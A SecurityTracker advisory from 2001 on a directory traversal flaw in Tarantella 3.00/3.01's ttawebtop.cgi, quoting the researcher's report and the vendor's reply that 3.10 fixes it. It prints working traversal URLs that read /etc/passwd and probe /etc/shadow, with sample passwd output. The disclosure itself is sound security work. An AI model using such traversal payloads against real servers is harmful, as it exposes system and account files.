SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Tarantella Vendors:   Tarantella, Inc.
(Vendor Has Fixed This Issue) Re: Tarantella Application Web Server Discloses Files on the Server to Remote Users
SecurityTracker Alert ID:  1001782
SecurityTracker URL:  http://securitytracker.com/id/1001782
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 19 2001
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 3.00 and 3.01 only
Description:   A vulnerability has been reported in the Tarantella application server that lets remote users obtain files located anywhere on the server.

The vunerability reportedly resides in the ttawebtop.cgi module.

If a remote user issues the following type of example URL, the server will return the world-readable password file:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

If a remote user attempts to retrieve a file that is not readable by the web server, it will return a 'file missing' error message, as shown below:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

File missing

The following file could not be found:

/tarantella/../../../../../../../../../../../../../../../etc/shadow

The vendor has reportedly been notified.

Impact:   A remote user can obtain world-readable files located anywhere from the server.
Solution:   The vendor notes that this vulnerability was introduced in release 3.01 and was caught during a security audit and was fixed in the last release (Tarantella 3.10). The only vulnerable versions are reported to be releases 3.00 and 3.01.

To fix this problem, the vendor recommends upgrading to 3.10.

Vendor URL:  www.tarantella.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Caldera/SCO), Linux (Red Hat Linux), Linux (SuSE), Linux (Turbo Linux), UNIX (AIX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 19 2001 Tarantella Application Web Server Discloses Files on the Server to Remote Users



 Source Message Contents

Subject:  Re: SCO Tarantella Remote file read via ttawebtop.cgi


On Monday June 18, KF wrote:
> SCO has been notified of this issue. 
> 
> 
> -------- Original Message --------
> Subject: SCO Tarantella Remote file read via ttawebtop.cgi
> Date: Mon, 18 Jun 2001 13:06:41 -0400
> From: KF <dotslash@snosoft.com>
> To: recon@snosoft.com
> 
> 
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
> 
> root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
> daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
> lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
> shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
> halt:x:7:0:halt:/sbin:/sbin/
> ...
> 
> 
> No perms to shadow... 
> 
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow
> 
>  
> File missing
> 
> The following file could not be found:
> 
>                                               
> /tarantella/../../../../../../../../../../../../../../../etc/shadow
> 
>  Please give this information to a Tarantella Administrator.
> 
> -KF


This problem was introduced in release 3.01 and was caught during a security 
audit and was fixed for our last release (Tarantella 3.10).

It is a problem for releases 3.00 and 3.01 only.

To fix this problem upgrade to 3.10.

Thank you for reporting this problem.

 - Mike McEwen


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC